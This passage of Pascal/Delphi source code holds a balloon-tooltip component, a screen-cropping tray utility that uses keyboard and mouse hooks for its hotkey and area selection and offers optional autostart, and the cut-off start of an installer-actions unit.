TBalloonVert; FPosition: TBalloonPosition; FControl: TWinControl; FBalloonType: TBalloonType; Balloon: TBalloon; procedure SetText(Value: TStringList); public procedure ShowControlBalloon; procedure HideControlBalloon; procedure ShowPixelBalloon; published property Text: TStringList read FText write SetText; property Title: String read FTitle write FTitle; property Duration: Integer read FDuration write FDuration; property Horizontal: TBalloonHoriz read FHorizontal write FHorizontal; property Vertical: TBalloonVert read FVertical write FVertical; property Position: TBalloonPosition read FPosition write FPosition; property Control: TWinControl read FControl write FControl; property PixelCoordinateX: Integer read FPixelCoordinateX write FPixelCoordinateX; property PixelCoordinateY: Integer read FPixelCoordinateY write FPixelCoordinateY; property BalloonType: TBalloonType read FBalloonType write FBalloonType; Constructor Create(AOwner: TComponent); override; Destructor Destroy; override; End; Procedure Register; Implementation // {$R Balloon.res} Procedure Register; Begin RegisterComponents('Custom', [TBalloonControl]); End; Constructor TBalloonControl.Create(AOwner: TComponent); Begin Inherited; FText := TStringList.Create; End; Destructor TBalloonControl.Destroy; Begin FText.Free; Inherited; End; procedure TBalloonControl.SetText(Value: TStringList); begin FText.Assign(Value); end; Procedure TBalloonControl.HideControlBalloon; begin if Assigned(Balloon) and Balloon.Visible then Balloon.Release; end; Procedure TBalloonControl.ShowControlBalloon(); // Var // Balloon: TBalloon; Begin Balloon := TBalloon.CreateNew(Owner); Balloon.ShowControlBalloon(FControl, FHorizontal, FVertical, FTitle, Trim(FText.Text), FBalloonType, FDuration); End; Procedure TBalloonControl.ShowPixelBalloon(); // Var // Balloon: TBalloon; Begin Balloon := TBalloon.CreateNew(nil); Balloon.ShowBalloon(FPixelCoordinateX, FPixelCoordinateY, FTitle, Trim(FText.Text), FBalloonType, FDuration, FPosition); End; Procedure TBalloon.CreateParams(Var Params: TCreateParams); Begin Inherited CreateParams(Params); Params.Style := (Params.Style and not WS_CAPTION) or WS_POPUP; Params.ExStyle := Params.ExStyle or WS_EX_TOOLWINDOW or WS_EX_NOACTIVATE or WS_EX_TOPMOST; Params.WndParent := GetDesktopWindow; End; procedure TBalloon.DoRelease; begin if Assigned(FOnRelease) then FOnRelease(Self); Release; end; Procedure TBalloon.OnMouseClick(Sender: TObject); Begin DoRelease; End; Procedure TBalloon.OnExitTimerEvent(Sender: TObject); Begin DoRelease; End; Procedure TBalloon.OnChange(Sender: TObject); Begin SetWindowPos(Handle, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOACTIVATE or SWP_NOMOVE or SWP_NOSIZE); End; Procedure TBalloon.WndProc(Var Message: TMessage); Begin If (Message.Msg = WM_SIZE) and (Message.WParam = SIZE_MINIMIZED) Then Show; Inherited; End; Constructor TBalloon.CreateNew(AOwner: TComponent; Dummy: Integer = 0); Begin Inherited; OnActivate := OnChange; OnDeactivate := OnChange; OnShow := OnChange; BorderStyle := bsNone; FormStyle := fsStayOnTop; OnPaint := FormPaint; Color := clInfoBk; Font.Name := 'Tahoma'; pnlAlign := TPanel.Create(Self); lblTitle := TLabel.Create(Self); lblText := TLabel.Create(Self); iconBitmap := TImage.Create(Self); tmrExit := TTimer.Create(Self); OnClick := OnMouseClick; iconBitmap.OnClick := OnMouseClick; pnlAlign.OnClick := OnMouseClick; lblTitle.OnClick := OnMouseClick; lblText.OnClick := OnMouseClick; lblTitle.Parent := Self; lblTitle.ParentColor := True; lblTitle.ParentFont := True; lblTitle.AutoSize := True; lblTitle.Font.Style := [fsBold]; lblTitle.Left := 34; lblTitle.Top := 12; lblText.Parent := Self; lblText.ParentColor := True; lblText.ParentFont := True; lblText.AutoSize := True; lblText.Left := 10; iconBitmap.Parent := Self; iconBitmap.Transparent := True; iconBitmap.Left := 10; iconBitmap.Top := 10; tmrExit.Enabled := False; tmrExit.Interval := 0; tmrExit.OnTimer := OnExitTimerEvent; End; Procedure TBalloon.FormPaint(Sender: TObject); Var TempRegion: HRGN; Begin With Canvas.Brush Do Begin Color := clBlack; Style := bsSolid; End; TempRegion := CreateRectRgn(0, 0, 1, 1); GetWindowRgn(Handle, TempRegion); FrameRgn(Canvas.Handle, TempRegion, Canvas.Brush.Handle, 1, 1); DeleteObject(TempRegion); End; Procedure TBalloon.ShowControlBalloon(blnControl: TWinControl; blnHoriz: TBalloonHoriz; blnVert: TBalloonVert; blnTitle, blnText: String; blnType: TBalloonType; blnDuration: Integer); Var Rect: TRect; blnPosLeft, blnPosTop: Integer; blnPosition: TBalloonPosition; Begin GetWindowRect(blnControl.Handle, Rect); blnPosTop := 0; blnPosLeft := 0; If blnVert = blnTop Then blnPosTop := Rect.Top; If blnVert = blnCenter Then blnPosTop := Rect.Top + Round((Rect.Bottom - Rect.Top) / 2); If blnVert = blnBottom Then blnPosTop := Rect.Bottom; If blnHoriz = blnLeft Then blnPosLeft := Rect.Left; If blnHoriz = blnMiddle Then blnPosLeft := Rect.Left + Round((Rect.Right - Rect.Left) / 2); If blnHoriz = blnRight Then blnPosLeft := Rect.Right; blnPosition := blnArrowBottomRight; If ((blnHoriz = blnRight) and (blnVert = blnBottom)) or ((blnHoriz = blnMiddle) and (blnVert = blnBottom)) Then blnPosition := blnArrowBottomRight; If (blnHoriz = blnLeft) and (blnVert = blnBottom) or ((blnHoriz = blnLeft) and (blnVert = blnCenter)) Then blnPosition := blnArrowBottomLeft; If (blnHoriz = blnLeft) and (blnVert = blnTop) or ((blnHoriz = blnMiddle) and (blnVert = blnTop)) Then blnPosition := blnArrowTopLeft; If (blnHoriz = blnRight) and (blnVert = blnTop) or ((blnHoriz = blnRight) and (blnVert = blnCenter)) Then blnPosition := blnArrowTopRight; ShowBalloon(blnPosLeft, blnPosTop, blnTitle, blnText, blnType, blnDuration, blnPosition); End; Procedure TBalloon.ShowBalloon(blnLeft, blnTop: Integer; blnTitle, blnText: String; blnType: TBalloonType; blnDuration: Integer; blnPosition: TBalloonPosition); Var ArrowHeight, ArrowWidth: Integer; FormRegion, ArrowRegion: HRGN; Arrow: Array [0 .. 2] Of TPoint; ResName: String; Begin ArrowHeight := 20; ArrowWidth := 20; lblTitle.Caption := blnTitle; If blnPosition = blnArrowBottomRight Then lblTitle.Top := lblTitle.Top + ArrowHeight; If blnPosition = blnArrowBottomLeft Then lblTitle.Top := lblTitle.Top + ArrowHeight; lblText.Top := lblTitle.Top + lblTitle.Height + 8; lblText.Caption := blnText; If blnPosition = blnArrowBottomRight Then iconBitmap.Top := iconBitmap.Top + ArrowHeight; If blnPosition = blnArrowBottomLeft Then iconBitmap.Top := iconBitmap.Top + ArrowHeight; Case blnType Of blnNone: ResName := ''; blnError: ResName := 'ERROR'; blnInfo: ResName := 'INFO'; blnWarning: ResName := 'WARNING'; Else ResName := 'INFO'; End; if ResName <> '' then iconBitmap.Picture.Bitmap.LoadFromResourceName(HInstance, ResName) else lblTitle.Left := iconBitmap.Left; If blnPosition = blnArrowBottomRight Then ClientHeight := lblText.Top + lblText.Height + 10; If blnPosition = blnArrowBottomLeft Then ClientHeight := lblText.Top + lblText.Height + 10; If blnPosition = blnArrowTopLeft Then ClientHeight := lblText.Top + lblText.Height + 10 + ArrowHeight; If blnPosition = blnArrowTopRight Then ClientHeight := lblText.Top + lblText.Height + 10 + ArrowHeight; If (lblTitle.Left + lblTitle.Width) > (lblText.Left + lblText.Width) Then Width := lblTitle.Left + lblTitle.Width + 10 Else Width := lblText.Left + lblText.Width + 10; If blnPosition = blnArrowTopLeft Then Begin Left := blnLeft - (Width - 20); Top := blnTop - (Height); End; If blnPosition = blnArrowTopRight Then Begin Left := blnLeft - 20; Top := blnTop - (Height); End; If blnPosition = blnArrowBottomRight Then Begin Left := blnLeft - 20; Top := blnTop - 2; End; If blnPosition = blnArrowBottomLeft Then Begin Left := blnLeft - (Width - 20); Top := blnTop - 2; End; FormRegion := 0; If blnPosition = blnArrowTopLeft Then Begin FormRegion := CreateRoundRectRgn(0, 0, Width, Height - (ArrowHeight - 2), 7, 7); Arrow[0] := Point(Width - ArrowWidth - 20, Height - ArrowHeight); Arrow[1] := Point(Width - 20, Height); Arrow[2] := Point(Width - 20, Height - ArrowHeight); End; If blnPosition = blnArrowTopRight Then Begin FormRegion := CreateRoundRectRgn(0, 0, Width, Height - (ArrowHeight - 2), 7, 7); Arrow[0] := Point(20, Height - ArrowHeight); Arrow[1] := Point(20, Height); Arrow[2] := Point(20 + ArrowWidth, Height - ArrowHeight); End; If blnPosition = blnArrowBottomRight Then Begin FormRegion := CreateRoundRectRgn(0, ArrowHeight + 2, Width, Height, 7, 7); Arrow[0] := Point(20, 2); Arrow[1] := Point(20, ArrowHeight + 2); Arrow[2] := Point(20 + ArrowWidth, ArrowHeight + 2); End; If blnPosition = blnArrowBottomLeft Then Begin FormRegion := CreateRoundRectRgn(0, ArrowHeight + 2, Width, Height, 7, 7); Arrow[0] := Point(Width - 20, 2); Arrow[1] := Point(Width - 20, ArrowHeight + 2); Arrow[2] := Point(Width - 20 - ArrowWidth, ArrowHeight + 2); End; ArrowRegion := CreatePolygonRgn(Arrow, 3, WINDING); CombineRgn(FormRegion, FormRegion, ArrowRegion, RGN_OR); DeleteObject(ArrowRegion); SetWindowRgn(Handle, FormRegion, True); Visible := False; ShowWindow(Handle, SW_SHOWNOACTIVATE); Visible := True; tmrExit.Interval := blnDuration * 1000; tmrExit.Enabled := True; End; End.
unit MainFormUnit; {$mode objfpc}{$H+} interface uses Classes, SysUtils, FileUtil, Forms, Controls, Graphics, Dialogs, ExtCtrls, Menus, jwawinuser, windows, jwawinreg; type { TSelectionForm } TSelectionForm = class(TForm) ChangeMonitorItem: TMenuItem; LaunchOnStartup: TMenuItem; ChangeCombItem: TMenuItem; ShowCombItem: TMenuItem; QuitItem: TMenuItem; SelectionShape: TShape; TrayPopup: TPopupMenu; TrayIcon: TTrayIcon; procedure ChangeCombItemClick(Sender: TObject); procedure FormCreate(Sender: TObject); procedure FormDestroy(Sender: TObject); procedure LaunchOnStartupClick(Sender: TObject); procedure QuitItemClick(Sender: TObject); procedure ShowCombItemClick(Sender: TObject); private { private declarations } public { public declarations } end; var SelectionForm: TSelectionForm; kbdHook: HHOOK; mouseHook: HHOOK; takingScreenShot: boolean; selectingScreenShotArea: boolean; currTopLeftX, currTopLeftY: longInt; currMonitor: ^TMonitor; hotkeyCombination: array of DWORD; changingCombination: boolean; currCombinationString: string; implementation {$R *.lfm} { TSelectionForm } function getAppropriateStringForVirtualKey(vKeyCode: longInt): string; forward; function Find(const ValueToFind: DWORD; var arr: array of DWORD): longInt; var i: longInt; begin for i:=0 to Length(arr)-1 do begin if (arr[i] = ValueToFind) then begin result := i; exit; end; end; result := -1; end; function isBitSet(const AValueToCheck, ABitIndex: LongInt): Boolean; begin Result := AValueToCheck and (1 shl ABitIndex) <> 0; end; function KeyIsDown(vkCode: DWORD): boolean; begin exit(isBitSet(GetKeyState(vkCode), 15)); end; function ArrayToString(const a: array of Char): string; begin if Length(a)>0 then SetString(Result, PChar(@a[0]), Length(a)) else Result := ''; end; procedure Split(Delimiter: Char; Str: string; ListOfStrings: TStrings) ; begin ListOfStrings.Clear; ListOfStrings.Delimiter := Delimiter; ListOfStrings.StrictDelimiter := True; // Requires D2006 or newer. ListOfStrings.DelimitedText := Str; end; procedure loadCombinationFromString(combinationStr: string); var combinationVKCodesString: TStringList; i: longInt; tempKeyString: string; newCombinationString: string; tempVKChar: char; begin combinationVKCodesString := TStringList.Create; Split(',', combinationStr, combinationVKCodesString); SetLength(hotkeyCombination, combinationVKCodesString.Count); //showMessage(IntTOStr(combinationVKCodesString.Count)); for i:=0 to combinationVKCodesString.Count-1 do begin hotkeyCombination[i] := StrToInt(combinationVKCodesString.Strings[i]); end; // combinationStr is a comma separated values of vkCodes for the combination for i:=0 to Length(hotkeyCombination)-1 do begin tempKeyString := getAppropriateStringForVirtualKey(hotkeyCombination[i]); // if the key is not syskey, returns 'N/A' if (tempKeyString = 'N/A') then begin // translate vk to char tempVKChar := char(MapVirtualKey(hotkeyCombination[i], 2)); //showMessage(arrayToString(tempVKChar)); if (newCombinationString = '') then begin newCombinationString := tempVKChar; end else begin newCombinationString := newCombinationString + '-' + UpperCase(tempVKChar); end; end else begin if (newCombinationString = '') then begin newCombinationString := tempKeyString; end else begin newCombinationString := newCombinationString + '-' + UpperCase(tempKeyString); end; end; end; currCombinationString := newCombinationString; end; function kbdHookProc(nCode: longInt; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall; var KBInfoStruct: ^KBDLLHOOKSTRUCT; vKeyCode: LONG; drawReg: HRGN; i: longInt; takeScreenShot: boolean; tempKeyCode: DWORD; newCombinationString: string; tempKeyString: string; tempVKChar: char; hFirstTimeRunKey: HKEY; currCombinationVkCodeString: string; begin if (nCode < 0) or ((wParam <> WM_KEYDOWN) and (wParam <> WM_SYSKEYDOWN)) and (not(changingCombination and ((wParam = WM_KEYUP) or (wParam = WM_SYSKEYUP)))) then // only presses, but releases too only when comnination is being changed begin result := CallNextHookEx(0, nCode, wParam, lParam); exit; end; KBInfoStruct := PKBDLLHOOKSTRUCT(lParam); vKeyCode := KBInfoStruct^.vkCode; // we don't want to differtiate between left and right versions of ctrl, alt, shift, so translate their codes into normal ones if (vKeyCode = VK_LMENU) or (vKeyCode = VK_RMENU) then begin vKeyCode := VK_MENU; end else if (vKeyCode = VK_LCONTROL) or (vKeyCode = VK_RCONTROL) then begin vKeyCode := VK_CONTROL; end else if (vKeyCode = VK_LSHIFT) or (vKeyCode = VK_RSHIFT) then begin vKeyCode := VK_SHIFT; end; if ((wParam = WM_KEYUP) or (wParam = WM_SYSKEYUP)) then // we're changing combination and releasing a key begin for i:=0 to Length(hotkeyCombination)-1 do begin // if the key being released is in our combination array, remove it from there // because the order doesn't really matter, we can just swap it with the last one and decrease the length of array by 1 if (hotkeyCombination[i] = vKeyCode) then begin if (i = Length(hotkeyCombination)-1) then // last one, just decrease the length begin SetLength(hotkeyCombination, Length(hotkeyCombination)-1); break; end; // swap with last and delete last tempKeyCode := hotkeyCombination[i]; hotkeyCombination[i] := hotkeyCombination[Length(hotkeyCombination)-1]; hotkeyCombination[Length(hotkeyCombination)-1] := tempKeyCode; SetLength(hotkeyCombination, Length(hotkeyCombination)-1); break; end; end; result := CallNextHookEx(0, nCode, wParam, lParam); exit; end; if (vKeyCode = VK_ESCAPE) then begin SelectionForm.SelectionShape.Visible:=false; SelectionForm.Refresh; SelectionForm.Repaint; SelectionForm.Visible:=false; selectingScreenShotArea := false; takingScreenShot := false; SelectionForm.SelectionShape.Width:=0; SelectionForm.SelectionShape.Height:=0; drawReg := CreateRectRgn(0,0,0,0); SetWindowRgn(SelectionForm.Handle, drawReg, true); end; if (changingCombination) then begin // add the key pressed if it's not already in the combination if (vKeyCode <> VK_ESCAPE) and (vKeyCode <> VK_RETURN) and (Find(vKeyCode, hotkeyCombination) = -1) then begin SetLength(hotkeyCombination, Length(hotkeyCombination)+1); hotkeyCombination[Length(hotkeyCombination)-1] := vKeyCode; end; if (vKeyCode = VK_RETURN) and (Length(hotkeyCombination) > 0) then // accept new key combination begin newCombinationString := ''; changingCombination := false; // and show it for i:=0 to Length(hotkeyCombination)-1 do begin tempKeyString := getAppropriateStringForVirtualKey(hotkeyCombination[i]); // if the key is not syskey, returns 'N/A' if (tempKeyString = 'N/A') then begin // translate vk to char tempVKChar := char(MapVirtualKey(hotkeyCombination[i], 2)); //showMessage(arrayToString(tempVKChar)); if (newCombinationString = '') then begin newCombinationString := tempVKChar; end else begin newCombinationString := newCombinationString + '-' + UpperCase(tempVKChar); end; end else begin if (newCombinationString = '') then begin newCombinationString := tempKeyString; end else begin newCombinationString := newCombinationString + '-' + UpperCase(tempKeyString); end; end; end; currCombinationString := newCombinationString; SelectionForm.TrayIcon.BalloonTitle:='You new combination'; SelectionForm.TrayIcon.BalloonHint:=newCombinationString; SelectionForm.TrayIcon.ShowBalloonHint; for i:=0 to Length(hotKeyCombination)-1 do begin if (currCombinationVkCodeString = '') then begin currCombinationVkCodeString := currCombinationVkCodeString + IntToStr(hotkeyCombination[i]); end else begin currCombinationVkCodeString := currCombinationVkCodeString + ', ' + IntToStr(hotkeyCombination[i]); end; end; RegOpenKeyEx(HKEY_CURRENT_USER, 'Software\ScreenCropper', 0, KEY_READ or KEY_WRITE, hFirstTimeRunKey); RegSetValueEx(hFirstTimeRunKey, 'ActivationCombination', 0, REG_SZ, LPBYTE(currCombinationVkCodeString), (Length(currCombinationVkCodeString)+1)*2); result := CallNextHookEx(0, nCode, wParam, lParam); exit; end; result := CallNextHookEx(0, nCode, wParam, lParam); exit; end; takeScreenShot := true; for i:=0 to Length(hotkeyCombination)-1 do begin if (hotkeyCombination[i] = vKeyCode) then begin continue; end; if not(KeyIsDown(hotkeyCombination[i])) then begin takeScreenShot := false; break; end; end; if (takeScreenShot) and (not(selectingScreenShotArea)) then begin if ((SelectionForm.Left <> Screen.DesktopLeft) or (SelectionForm.Top <> Screen.DesktopTop)) then begin SelectionForm.Left := Screen.DesktopLeft; SelectionForm.Top := Screen.DesktopTop; end; SelectionForm.Width:=Screen.DesktopWidth; SelectionForm.Height:=Screen.DesktopHeight; drawReg := CreateRectRgn(0,0,SelectionForm.Width,SelectionForm.Height); SetWindowRgn(SelectionForm.Handle, drawReg, true); SelectionForm.Visible:=true; // this second check is weird, i know. but i have no idea to why after setting visible to false, my Left field is being cut in half.. if ((SelectionForm.Left <> Screen.DesktopLeft) or (SelectionForm.Top <> Screen.DesktopTop)) then begin SelectionForm.Left := Screen.DesktopLeft; SelectionForm.Top := Screen.DesktopTop; end; takingScreenShot := true; end; result := CallNextHookEx(0, nCode, wParam, lParam); end; function mouseHookProc(nCode: longInt; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall; var screenContext: HDC; compatibleContext: HDC; screenWidth: longInt; screenHeight: longInt; screenBitmap: HBITMAP; tempScreenBitmap: HBITMAP; drawReg: HRGN; mouseScreen, mouseClient: TPoint; copyBitMapPointTopLeft, tempShapePoint: TPoint; begin if ((nCode < 0) or ((wParam <> WM_LBUTTONDOWN) and (wParam <> WM_MOUSEMOVE) and (wParam <> WM_LBUTTONUP)) or not(takingScreenShot)) then begin result := CallNextHookEx(0, nCode, wParam, lParam); exit; end; mouseScreen.x := Mouse.CursorPos.x; mouseScreen.y := Mouse.CursorPos.y; mouseClient := SelectionForm.ScreenToClient(mouseScreen); if (wParam = WM_LBUTTONDOWN) then begin SelectionForm.SelectionShape.Visible:=true; currTopLeftX := mouseClient.x; currTopLeftY := mouseClient.y; SelectionForm.SelectionShape.Left:=mouseClient.x; SelectionForm.SelectionShape.Top:=mouseClient.y; selectingScreenShotArea := true; end else if ((wParam = WM_LBUTTONUP) and (selectingScreenShotArea)) then begin SelectionForm.SelectionShape.Visible:=false; SelectionForm.Refresh; SelectionForm.Repaint; SelectionForm.Visible:=false; screenContext := GetDC(0); compatibleContext := CreateCompatibleDC(screenContext); screenWidth := SelectionForm.SelectionShape.Width; screenHeight := SelectionForm.SelectionShape.Height; screenBitmap := CreateCompatibleBitmap(screenContext, screenWidth, screenHeight); tempScreenBitmap := SelectObject(compatibleContext, screenBitmap); tempShapePoint.x:=SelectionForm.SelectionShape.Left; tempShapePoint.y:=SelectionForm.SelectionShape.Top; copyBitMapPointTopLeft := SelectionForm.ClientToScreen(tempShapePoint); BitBlt(compatibleContext, 0, 0, screenWidth, screenHeight, screenContext, copyBitMapPointTopLeft.x, copyBitMapPointTopLeft.y, SRCCOPY); screenBitmap := SelectObject(compatibleContext, tempScreenBitmap); OpenClipboard(0); EmptyClipboard(); SetClipboardData(CF_BITMAP, screenBitmap); CloseClipboard(); DeleteDC(compatibleContext); ReleaseDC(0, screenContext); DeleteObject(screenBitmap); selectingScreenShotArea := false; takingScreenShot := false; SelectionForm.SelectionShape.Width:=0; SelectionForm.SelectionShape.Height:=0; drawReg := CreateRectRgn(0,0,0,0); SetWindowRgn(SelectionForm.Handle, drawReg, true); end else if ((wParam = WM_MOUSEMOVE) and (selectingScreenShotArea)) then begin if (currTopLeftX < mouseClient.x) then begin SelectionForm.SelectionShape.Left:=currTopLeftX; end else begin SelectionForm.SelectionShape.Left:=mouseClient.x; end; if (currTopLeftY < mouseClient.y) then begin SelectionForm.SelectionShape.Top:=currTopLeftY; end else begin SelectionForm.SelectionShape.Top:=mouseClient.y; end; SelectionForm.SelectionShape.Width:=Abs(currTopLeftX - mouseClient.x); SelectionForm.SelectionShape.Height:=Abs(currTopLeftY - mouseClient.y); drawReg := CreateRectRgn(SelectionForm.SelectionShape.Left, SelectionForm.SelectionShape.Top, SelectionForm.SelectionShape.Left + SelectionForm.SelectionShape.Width, SelectionForm.SelectionShape.Top + SelectionForm.SelectionShape.Height ); SetWindowRgn(SelectionForm.Handle, drawReg, true); end; result := CallNextHookEx(0, nCode, wParam, lParam); end; procedure TSelectionForm.FormCreate(Sender: TObject); var drawReg: HRGN; exePath: string; messageBoxReturn: longInt; hStartupKey: HKEY; hOldStartupKey: HKEY; hCheckStartupKey: HKEY; hFirstTimeRunKey: HKEY; hCreatedFirstTimeRunKey: HKEY; hLastCombinationKey: HKEY; lastCombinationType: DWORD; lastCombinationValue: array of BYTE; lastCombinationValueSize: DWORD; i: longInt; vkCombinationString: string; begin changingCombination := false; drawReg := CreateRectRgn(0,0,0,0); SetWindowRgn(Handle, drawReg, true); Canvas.Brush.Color:=clWhite; Canvas.Brush.Style:=bsSolid; Canvas.Pen.Style:=psClear; kbdHook := SetWindowsHookEx(WH_KEYBOARD_LL, @kbdHookProc, HInstance, 0); mouseHook := SetWindowsHookEx(WH_MOUSE_LL, @mouseHookProc, HInstance, 0); takingScreenShot := false; selectingScreenShotArea := false; if (RegOpenKeyEx(HKEY_CURRENT_USER, 'Software\ScreenCropper', 0, KEY_READ, hCreatedFirstTimeRunKey) <> ERROR_SUCCESS) then begin // running for the first time! SetLength(hotkeyCombination, 3); hotkeyCombination[0] := VK_CONTROL; hotkeyCombination[1] := VK_MENU; hotkeyCombination[2] := VK_C; currCombinationString := 'CTRL-ALT-C'; // let's see if we already have a screated registry file for stratup if (RegOpenKeyEx(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Run', 0, KEY_READ, hOldStartupKey) = ERROR_SUCCESS) then begin if (RegQueryValueEx(hOldStartupKey, 'ScreenCropper', nil, nil, nil, nil) = ERROR_FILE_NOT_FOUND) then begin // can't open startup registry for our exe, should we create it? messageBoxReturn := MessageBox(0, 'Do you want Screen Cropper to be run on Windows startup?', 'Screen Cropper', MB_YESNO or MB_ICONINFORMATION); exePath := Application.ExeName; if (messageBoxReturn = IDYES) then begin // add key to autorun reg if (RegCreateKey(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Run', hStartupKey) <> ERROR_SUCCESS) then begin // could not create reg key.. exePath MessageBox(0, 'Could not create registry key for Screen Cropper!', 'Screen Cropper', MB_OK or MB_ICONINFORMATION) end else begin RegSetValueEx(hStartupKey, 'ScreenCropper', 0, REG_SZ, LPBYTE(exePath), (Length(exePath)+1)*2); end; end; end; end; // put the vk codes of our combination in the value for i:=0 to Length(hotKeyCombination)-1 do begin if (vkCombinationString = '') then begin vkCombinationString := vkCombinationString + IntToStr(hotkeyCombination[i]); end else begin vkCombinationString := vkCombinationString + ', ' + IntToStr(hotkeyCombination[i]); end; end; RegCreateKey(HKEY_CURRENT_USER, 'Software\ScreenCropper', hFirstTimeRunKey); RegSetValueEx(hFirstTimeRunKey, 'ActivationCombination', 0, REG_SZ, LPBYTE(vkCombinationString), (Length(vkCombinationString)+1)*2); end else begin // running NOT for the first time.. read the last saved combination then RegOpenKeyEx(HKEY_CURRENT_USER, 'Software\ScreenCropper', 0, KEY_READ, hLastCombinationKey); SetLength(lastCombinationValue, 4000); // XDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD RegQueryValueEx(hLastCombinationKey, 'ActivationCombination', nil, @lastCombinationType, @lastCombinationValue[0], @lastCombinationValueSize); SetLength(lastCombinationValue, lastCombinationValueSize); for i:=0 to lastCombinationValueSize-1 do begin vkCombinationString := vkCombinationString + char(lastCombinationValue[i]); end; loadCombinationFromString(vkCombinationString); end; if (RegOpenKeyEx(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Run', 0, KEY_READ, hCheckStartupKey) = ERROR_SUCCESS) then begin // startup enabled if (RegQueryValueEx(hCheckStartupKey, 'ScreenCropper', nil, nil, nil, nil) = ERROR_FILE_NOT_FOUND) then begin // didn't find the startup value, it's not enabled then!! LaunchOnStartup.Checked:=false; end else begin LaunchOnStartup.Checked:=true; end; end end; procedure TSelectionForm.ChangeCombItemClick(Sender: TObject); begin SetLength(hotkeyCombination, 0); changingCombination := true; TrayIcon.BalloonTitle:='Changing combination'; TrayIcon.BalloonHint:='You are currently changing the combination that activates Screen Cropper. Push on the desired keys and, while holding them down, push Enter'; TrayIcon.ShowBalloonHint; end; procedure TSelectionForm.FormDestroy(Sender: TObject); begin UnhookWindowsHookEx(kbdHook); UnhookWindowsHookEx(mouseHook); end; procedure TSelectionForm.LaunchOnStartupClick(Sender: TObject); var startupKey: HKEY; newStartupKey: HKEY; exePath: string; begin exePath := Application.ExeName; RegOpenKeyEx(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Run', 0, KEY_READ or KEY_WRITE, startupKey); if (LaunchOnStartup.Checked) then begin // remove ScreenCropper value from Software\Microsoft\Windows\CurrentVersion\Run RegDeleteValue(startupKey, 'ScreenCropper'); end else begin // else add it if (RegCreateKey(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Run', newStartupKey) <> ERROR_SUCCESS) then begin // could not create reg key.. MessageBox(0, 'Could not create registry key for Screen Cropper!', 'Screen Cropper', MB_OK or MB_ICONINFORMATION) end else begin RegSetValueEx(newStartupKey, 'ScreenCropper', 0, REG_SZ, LPBYTE(exePath), (Length(exePath)+1)*2); end; end; LaunchOnStartup.Checked:=not(LaunchOnStartup.Checked); end; procedure TSelectionForm.QuitItemClick(Sender: TObject); begin Application.Terminate; end; procedure TSelectionForm.ShowCombItemClick(Sender: TObject); begin TrayIcon.BalloonTitle:='Your combination'; TrayIcon.BalloonHint:=currCombinationString; TrayIcon.ShowBalloonHint; end; function getAppropriateStringForVirtualKey(vKeyCode: longInt): string; var fKeyNum: longInt; begin if (vKeyCode = VK_TAB) then begin exit('TAB'); end else if (vKeyCode = VK_CAPITAL) then begin exit('CAPS'); end else if (vKeyCode = VK_LSHIFT) then begin exit('SHIFT'); end else if (vKeyCode = VK_RSHIFT) then begin exit('SHIFT'); end else if (vKeyCode = VK_SHIFT) then begin exit('SHIFT'); end else if (vKeyCode = VK_LCONTROL) then begin exit('CTRL'); end else if (vKeyCode = VK_RCONTROL) then begin exit('CTRL'); end else if (vKeyCode = VK_CONTROL) then begin exit('CTRL'); end else if (vKeyCode = VK_LWIN) then begin exit('LWIN'); end else if (vKeyCode = VK_RWIN) then begin exit('RWIN'); end else if (vKeyCode = VK_LMENU) then begin exit('ALT'); end else if (vKeyCode = VK_RMENU) then begin exit('ALT'); end else if (vKeyCode = VK_MENU) then begin exit('ALT'); end else if (vKeyCode in [32..47]) then begin if (vKeyCode = 32) then begin exit('SPACEBAR'); end else if (vKeyCode = 33) then begin exit('PG UP'); end else if (vKeyCode = 34) then begin exit('PG DOWN'); end else if (vKeyCode = 35) then begin exit('END'); end else if (vKeyCode = 36) then begin exit('HOME'); end else if (vKeyCode = 37) then begin exit('LEFT ARROW'); end else if (vKeyCode = 38) then begin exit('UP ARROW'); end else if (vKeyCode = 39) then begin exit('RIGHT ARROW'); end else if (vKeyCode = 40) then begin exit('DOWN ARROW'); end else if (vKeyCode = 41) then begin exit('SELECT'); end else if (vKeyCode = 42) then begin exit('PREINT'); end else if (vKeyCode = 43) then begin exit('EXECUTE'); end else if (vKeyCode = 44) then begin exit('PRINT SCREEN'); end else if (vKeyCode = 45) then begin exit('INS'); end else if (vKeyCode = 46) then begin exit('DEL'); end else if (vKeyCode = 47) then begin exit('HELP'); end; end else if (vKeyCode in [112..135]) then // F1-F24 begin fKeyNum := vKeyCode - 111; exit('F'+IntToStr(fKeyNum)); end else if (vKeyCode in [144..145]) then begin if (vKeyCode = 144) then begin exit('NUM LOCK'); end else if (vKeyCode = 145) then begin exit('SCROLL LOCK'); end; end else begin exit('N/A'); end; end; end.
unit uInstallActions; {$WARN SYMBOL_PLATFORM OFF} interface uses System.Classes, System.StrUtils, System.SysUtils, System.Win.Registry, Winapi.ActiveX, Winapi.Windows, Winapi.Messages, Winapi.ShellApi, Winapi.ShlObj, Dmitry.Utils.ShortCut, Dmitry.Utils.System, UnitINI, uMemory, uInstallTypes, uInstallUtils, uConstants, uInstallScope, uRuntime, uTranslate, uInstallZip, uAssociations, uShellUtils, uActions, uLogger, uUserUtils, uStillImage; const InstallPoints_Close_PhotoDB = 1024 * 1024; InstallPoints_ShortCut = 500 * 1024; InstallPoints_FileAction = 500 * 1024; InstallPoints_Registry = 128 * 1024; InstallPoints_RunProgram = 1024 * 1024; InstallPoints_StillImage = 512 * 1024; type TUpdatePreviousVersions = class(TInstallAction) end; TInstallUpdates = class(TInstallAction) end; TInstallCloseApplication = class(TInstallAction) public function CalculateTotalPoints: Int64; override; procedure Execute(Callback: TActionCallback); override; end; TInstallFiles = class(TInstallAction) private FTotal: Int64; FCurrentlyDone: Int64; FCallBack: TActionCallback; procedure InternalCallBack(BytesRead, BytesTotal: Int64; var Terminate: Boolean); public function CalculateTotalPoints: Int64; override; procedure Execute(Callback: TActionCallback); override; end; TInstallFileActions = class(TInstallAction) public function 